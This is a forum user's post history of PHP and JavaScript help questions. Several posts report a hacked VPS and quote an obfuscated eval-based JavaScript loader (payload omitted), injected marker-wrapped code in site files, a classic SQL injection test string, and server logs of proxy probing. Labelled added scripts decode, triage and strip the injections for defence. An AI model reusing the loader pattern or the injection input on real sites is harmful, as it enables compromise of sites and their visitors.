
tommyboy123x

Everything posted by tommyboy123x

  1. Damn, thank you so much dark.... I didn't realize how out of touch I was. I also wanted to give an update here - the attacker has attempted two other times to add some obfuscated JavaScript code in the js files... this is becoming a serious problem.
         try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}
         a="[hex-encoded payload omitted]";
         z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}
         eval(ss["fr"+"omCharCode"].apply(ss,z));
     How are you testing these injections? Are you convinced this is the cause of these attacks? When I try something like "X' or 1=1" (without the quotes) I can't get it to work how I would expect. I'll be back in a few days with the changes.
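
Added example, not part of the original post: a static decoder for the loader quoted in post 1, which turns hex pairs into characters after subtracting a constant and then passes the result to eval. The function names and the sample input are constructed for illustration; the script under inspection is only read as text and never executed.

```javascript
// Static decoder for the loader quoted in the post: hex pairs, each shifted by a
// constant, rebuilt with String.fromCharCode. The script is only read as text.

// Find the longest hex string literal and the shift applied after parseInt(..., 16).
function extractEncoded(source) {
  const literals = source.match(/["'][0-9a-fA-F]{16,}["']/g) || [];
  if (literals.length === 0) return null;
  const hex = literals.sort((a, b) => b.length - a.length)[0].slice(1, -1);
  const m = source.match(/parseInt\([^)]*\)\s*,\s*16\s*\)\s*([+-])\s*(\d+)/);
  const shift = m ? (m[1] === "-" ? -1 : 1) * Number(m[2]) : 0;
  return { hex, shift };
}

function decodeHex(hex, shift) {
  if (hex.length % 2 !== 0) throw new Error("odd-length hex string");
  let out = "";
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16) + shift);
  }
  return out;
}

// Decode and list what the hidden script would touch, without running it.
function analyse(source) {
  const enc = extractEncoded(source);
  if (!enc) return null;
  const decoded = decodeHex(enc.hex, enc.shift);
  return {
    shift: enc.shift,
    decoded,
    urls: decoded.match(/https?:\/\/[^\s'"<>)]+/g) || [],
    writesMarkup: /document\.write|createElement|appendChild/.test(decoded),
    touchesCookies: /document\.cookie/.test(decoded),
  };
}

// Constructed sample: a harmless statement encoded the same way (char code + 14).
function encodeSample(text, shift) {
  return [...text].map(c => (c.charCodeAt(0) - shift).toString(16).padStart(2, "0")).join("");
}
const INNER = "document.write('<a href=\"http://example.invalid/x\">t</a>');";
const SAMPLE = 'a="' + encodeSample(INNER, -14) +
  '";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}';

console.log(analyse(SAMPLE));
```

Run it with Node against a saved copy of the suspect file; the decoded text and the URL list show what the injection loads without letting it run.
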
  2. Could you elaborate? As far as I'm aware, there is no way to add an sql injection on this form... it does pass the data without mysql_real_escape_string but it also converts it into an md5 hash before adding to an SQL line. I also believe this may have been possible because of my lax permission set. A lot of these files were 775 by default, and I think 640 is really what I want. Could this have been the cause? I still can't find the PHP logs, can anyone tell me where to find clues that can help me piece together what happened? It is a debian squeeze environment.
  3. It'll be a few weeks before things are fully operational again, and I don't want to make the same mistake by doing my security checks before I'm finished (and creating these openings). I have a hunch it was actually an exploit related to an on-site chat, which writes a string to a file to update the "last edited" time. It is a "comet implementation" based on http://www.zeitoun.net/articles/comet_and_php/start. I believe the attacker may have used this to gain write permissions. I also got lazy and made my ftp account the same group as apache (and the owner of ALL web files) which may have contributed to this. Anyways, login.php should be fixed for this particular exploit. I'll keep this tab open and post in a couple weeks when I do a complete analysis.
  4. Thanks for the help - I thought login.php used mysql_real_escape_string. A few years back I went through pretty carefully looking for XSS possibilities and other things like that, this must have been updated since then. I'll assume this was an SQL injection of some kind and keep my eyes out for other exploit possibilities. Thanks!
  5. I have this in my apache logs
         [Fri Jul 26 23:47:25 2013] [error] [client 96.254.171.2] script '/var/www/azenv.php' not found or unable to stat
     as well as a few other attempted fails at viewing directories and files that don't exist (such as /etc/apache2/htdocs and /var/www/config)
     In the access log I have this:
         96.254.171.2 - - [21/Jul/2013:01:30:02 +0000] "GET http://server5.cyberpods.net/azenv.php HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows; U; Windows NT ws NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)"
         96.254.171.2 - - [26/Jul/2013:07:56:15 +0000] "GET http://server5.cyberpods.net/azenv.php HTTP/1.1" 404 390 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9$
         77.73.5.166 - - [26/Jul/2013:07:56:32 +0000] "GET /wR38jPHK.gif HTTP/1.0" 200 262 "-" "Mozilla/5.0(Windows NT 5.0) AppleWebKit/5332 (KHTML, like Gecko) Chrome/13.0.813$
     Still trying to track down my php error logs based on my php.ini files, I'll edit if found but is any of this suspicious to you?
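
Added example, not part of the original post: a triage pass over Apache combined-format access log lines like the ones in post 5, flagging requests whose target is an absolute URL for a host this server does not serve (the form a client uses when it treats the server as a proxy). The `ownHosts` list, the function names and the sample lines are constructed for illustration.

```javascript
// Triage for Apache combined-format access logs: flag requests whose target is an
// absolute URL for a foreign host, i.e. the client is testing this server as a proxy.
const LINE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) ([^"]*)" (\d{3}) (\S+)/;

function parseLine(line) {
  const m = LINE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], target: m[4], status: Number(m[6]) };
}

function triage(lines, ownHosts) {
  const findings = [];
  for (const line of lines) {
    const r = parseLine(line);
    if (!r) continue; // not a combined-format request line
    const abs = /^https?:\/\/([^\/:]+)/i.exec(r.target);
    if (abs && !ownHosts.includes(abs[1].toLowerCase())) {
      findings.push({
        ip: r.ip,
        time: r.time,
        target: r.target,
        status: r.status,
        // A non-error status here means the server answered the proxied request.
        answered: r.status < 400,
      });
    }
  }
  return findings;
}

// Constructed sample lines (documentation IP ranges and example hosts).
const SAMPLE_LOG = [
  '192.0.2.10 - - [26/Jul/2013:07:56:15 +0000] "GET http://judge.example.net/azenv.php HTTP/1.1" 404 390 "-" "Mozilla/5.0"',
  '192.0.2.10 - - [26/Jul/2013:07:56:20 +0000] "GET http://www.example.org/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [26/Jul/2013:07:56:32 +0000] "GET /index.php HTTP/1.0" 200 262 "-" "Mozilla/5.0"',
  'not a log line',
];

console.log(triage(SAMPLE_LOG, ["www.example.org"]));
```
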
  6. I'm not sure this is the right place to post this, but here it goes... There seems to have been something that happened on July 26th - I haven't touched these files in months, yet there's this code added in the most common PHP files (like index.php, login.php) and EVERY javascript file
     php is as follows:
         <?
         #0f2490#
         echo('<img src=\"http://localhost/\" >');
         #/0f2490#
         ?>
     and on all my javascript files:
         /*0f2490*/
         document.write('<img src="http://localhost/" >');
         /*0f2490*/
     The exact same issue as this guy (on the same date) - http://translate.google.com/translate?hl=en&sl=de&u=http://www.awardcafe.de/printthread.php%3Ftid%3D1513&prev=/search%3Fq%3D0f2490%2Blocalhost%2B0f2490%26safe%3Doff%26client%3Dfirefox-a%26rls%3Dorg.mozilla:en-US:official%26channel%3Dfflb%26biw%3D1162%26bih%3D581
     Was my server compromised? What steps can I take to ensure this doesn't happen again? It's on a VPS I manage, so I wouldn't be too surprised if I ****ed something up, let me know what (if any) access logs you think may be relevant or even where to begin with this problem. Thanks!
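
Added example, not part of the original post: a detector for the marker-wrapped blocks described in post 6 (`#0f2490# ... #/0f2490#` in PHP files, `/*0f2490*/ ... /*0f2490*/` in JavaScript files), with a function that returns the file content with those blocks removed. Matching any six-hex-digit id instead of only `0f2490` is an assumption, and the sample file contents are constructed.

```javascript
// Detects and strips the marker-wrapped blocks described in the post.
// PHP form:  #0f2490# ... #/0f2490#     JS form:  /*0f2490*/ ... /*0f2490*/
// Assumption: related injections use the same layout with another 6-hex-digit id.
const PHP_BLOCK = /#([0-9a-f]{6})#[\s\S]*?#\/\1#/g;
const JS_BLOCK = /\/\*([0-9a-f]{6})\*\/[\s\S]*?\/\*\1\*\//g;
// A short PHP tag pair that contains nothing except one marker block.
const PHP_WRAPPED = /<\?(?:php)?\s*#([0-9a-f]{6})#[\s\S]*?#\/\1#\s*\?>\s*/g;

// Report every marker block with its id and position, in file order.
function findInjections(content) {
  const hits = [];
  for (const [kind, re] of [["php", PHP_BLOCK], ["js", JS_BLOCK]]) {
    for (const m of content.matchAll(re)) {
      hits.push({ kind, id: m[1], offset: m.index, length: m[0].length });
    }
  }
  return hits.sort((a, b) => a.offset - b.offset);
}

// Return the content with marker blocks removed; the caller decides whether to
// write it back or to restore the file from a known-good copy instead.
function stripInjections(content) {
  return content
    .replace(PHP_WRAPPED, "")
    .replace(PHP_BLOCK, "")
    .replace(JS_BLOCK, "");
}

// Constructed samples in the shape the post describes.
const PHP_SAMPLE =
  "<?\n#0f2490#\necho('x');\n#/0f2490#\n?>\n<?php echo 'home'; ?>\n";
const JS_SAMPLE =
  "/*0f2490*/\ndocument.write('x');\n/*0f2490*/\nfunction ok(){ return 1; }\n";

console.log(findInjections(PHP_SAMPLE), findInjections(JS_SAMPLE));
console.log(JSON.stringify(stripInjections(PHP_SAMPLE)));
```
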
  7. Eureka! I found out you need to send something to the browser in order to check if it is still alive - I chose "echo chr(0);" but you can also use echo "\n"; from what I hear. Tom
  8. I'm not sure what PHP considers an "aborted connection" and things like that, but the way this chat works is by updating a file and using the timestamp off it to determine if new posts exist. Rather than re-checking the server over and over, this code will check once and keep the connection open until a response is made. The only problem is, it works too well! Even after the tab is closed and I try another script on the site or the same script, it all hangs until I update the file - here is the code snippet:
         while (($currentmodif <= $lastmodif) && (connection_aborted() == 0) && (connection_status() == 0)){ // check if the data file has been modified
             usleep(10000); // sleep 10ms to unload the CPU
             if (connection_aborted ()) break;
             if (connection_status () != 0) break;
             clearstatcache();
             $currentmodif = filemtime($filename);
         }
     I have put several measures in to attempt to break the loop when the user disconnects, but it just doesn't work! It will continue to hang and hang and hang until I re-upload the file $filename
     HOW CAN I BREAK THE WHILE LOOP WHEN THE MEMBER LEAVES THE PAGE?
     I could post up an example but it's ultimately useless after one load unless you have control over updating the file. Thanks!
  9. this might sound dumb, but shouldn't "<?=" be "<?" in the title? could you change that to "<?php" ?
  10. Try unparsing the PHP code when the xampp code begins; One guess I have is that when the xampp code begins, it tries to start a new "<?php" when it has already been opened. I could tell you a little more if I saw the code / website
  11. It would definitely start by naming variables what they should be. I've noticed that it makes things a lot harder once you look back at old code or even when you are debugging. I'm with zanus on this one. Can you explain a bit more of what is going on / what the script does? There must be more than 1 file, right?
  12. I think he's just looking for an easy way to add a few thousand zip codes to a database. I would just make a table with all the places / locations / cities in it you want, then assign zip codes. From there you can have a search that would look like
          SELECT * FROM zipcodes WHERE zip='$zipcode' ORDER BY location ASC
      good luck!
  13. I know you said PHP posting was the easiest, but why not just use a simple flash based uploader? you can find tons of those scripts online. PHP isn't really designed to upload big files, unless i'm mistaken =\
  14. well mysql is searching literally for '"8/07/%"'. instead what you want is '"8/07/"%', if that makes any sense? If you want to keep the date how it is formatted but search for only the first part of the date, you need to store date as
          $date = date ('y/m/');
      then the query should look like
          SELECT * FROM `data` WHERE ... AND `data` LIKE '$date%' ORDER BY id DESC
      note the use of "LIKE" instead of "=", and the % wild card at the end of $date
      However, for a possibly more efficient way to keep records, store your data in the table as unix timestamps (number of seconds from December 31st 1969 12:00), and search for a date range that would correspond to the particular day you want to find (which in this case would be between 1216267200 and 1216353600). You can find some unix timestamp converters online, use time() to return a unix timestamp, date([FORMATTED DATE], [UNIX TIMESTAMP]) to reverse the process, etc. They are a lot easier to work with in the long run.
  15. I'm not sure if I fully understand your database / table setup, however try using a different function
          $row = mysql_fetch_array($result);
          // Quoted array keys inside a double-quoted string need the {$...} form
          $text = "Article: dumm1 Length: {$row['col_name_for_answer1']} Height: {$row['col_name_for_answer2']} etc...";
      hope it helps!
  16. For some reason when I attempt to connect to the server to download the log file (it has get variables to specify the date range), it won't work
      Also, this code is extremely... "simplified" and yet so ugly
          $url = 'http://..../'; #an example URL
          $password = 'password';
          $username = 'username';
          $filename = 'filename';
          $file = 'csvuploads/'.$filename;
          $timestamp = time();
          $em = date('n', $timestamp); #end month
          $ed = date('j', $timestamp); #end day
          $ey = date('Y', $timestamp); #end year
          $timestamp2 = $timestamp - 150000;
          $sm = date('n', $timestamp2); #etc...
          $sd = date('j', $timestamp2);
          $sy = date('Y', $timestamp2);
          $url0 = str_replace('{ey}',$ey,$url);
          $url1 = str_replace('{sm}',$sm,$url0);
          $url2 = str_replace('{sd}',$sd,$url1);
          $url3 = str_replace('{sy}',$sy,$url2);
          $url4 = str_replace('{em}',$em,$url3);
          $url = str_replace('{ed}',$ed,$url4);
          $ch = curl_init();
          $handle = fopen($file, 'w+');
          echo 'em: '.$em.'<br />ed: '.$ed.'<br />ey: '.$ey.'<br />sm: '.$sm.'<br />sd: '.$sd.'<br />sy: '.$sy.'<br />url: '.$url.'<br />username: '.$row['username'].'<br />password: '.$row['password'].'<br />';
          curl_setopt($ch, CURLOPT_COOKIEJAR, "inc/cookies.txt");
          curl_setopt($ch, CURLOPT_COOKIEFILE, "inc/cookies.txt");
          //curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
          curl_setopt($ch, CURLOPT_URL, $url);
          curl_setopt($ch, CURLOPT_USERPWD, $username.':'.$password);
          curl_setopt($ch, CURLOPT_FILE, $handle);
          if (!curl_exec($ch)){
              echo 'An error has occured!<br />Code: 8523x8';
              exit();
          }
          curl_close($ch);
      It creates the file and can output the data, however it gets hung up on the curl_exec(), where it doesn't connect properly. It loads for about 30 seconds and then gives up. Any advice? Also, I've tried copy() with even less luck using https://username:password@domain.com/....etc.../. Help appreciated!
  17. Topic solved. I didn't know cURL wouldn't just run, i thought it was almost the same as header(location:...); but with a little more options. thanks!
  18. So far it doesn't seem to be working to use the send() to send something to an external server. here is what i have.
          function ajaxFunction(){
              var ajaxRequest;
              try{
                  // Opera 8.0+, Firefox, Safari
                  ajaxRequest = new XMLHttpRequest();
              } catch (e){
                  // Internet Explorer Browsers
                  try{
                      ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
                  } catch (e) {
                      try{
                          ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
                      } catch (e){
                          // Something went wrong
                          alert("Your browser broke!");
                          return false;
                      }
                  }
              }
              ajaxRequest.open("GET", "http://mysite.com/tester.php?a=1&b=2&c=3", true);
              ajaxRequest.send(null);
          }
          ajaxFunction();
      the script this is running on is not mysite.com. Should this be working even though it is on an outside server?
  19. as promised
          echo '<script type="text/javascript">
          function ajaxFunction(){
              var ajaxRequest;
              try{
                  // Opera 8.0+, Firefox, Safari
                  ajaxRequest = new XMLHttpRequest();
              } catch (e){
                  // Internet Explorer Browsers
                  try{
                      ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
                  } catch (e) {
                      try{
                          ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
                      } catch (e){
                          // Something went wrong
                          alert("Your browser broke!");
                          return false;
                      }
                  }
              }
              ajaxRequest.open("GET", "http://mysite.com/test.php?a=1&b=2", true);
              ajaxRequest.send(null);
          }
          ajaxFunction();
          </script>';
      all i needed it to do was drop off the info and die, so this worked out perfectly. chrisdburns, pls check ur inbox
  20. AJAX!! why didn't i think of that?! I'll post up some code once i have it done. THANK YOU, you are a life saver!
  21. I know i can send it but how do i send the get variables without leaving the script?
  22. All i want to do is send URL GET data without going to the site. so, mysite.com wants to inform theirsite.org [and several others] that something has happened. It uses a cronjob to check every few minutes for this event and then when necessary, it will inform theirsite.org by sending a GET variable (http://theirsite.org/page.php?foo=bar). but it still has a few more sites to inform. How can i do this? I already left mysite.com so the script has terminated.
  23. no they would be people who signed up. i have no control over their scripts or anything... and it would have to be GET, not POST. would it be possible to do it with frames? have one frame on the script and the other loading the pages?
  24. i need to send multiple (as in hundreds) of get variables to different websites. I want to send them the data, but I do not want to visit their site / have the browser actually go there. Would this make any sense / am i on the right track?
          $ch = curl_init();
          curl_setopt($ch, CURLOPT_URL, "http://www.mysite.com/page.php?getvar1=true&getvar2=false");
          curl_exec ($ch);
      or is there an easier way that i'm simply not seeing?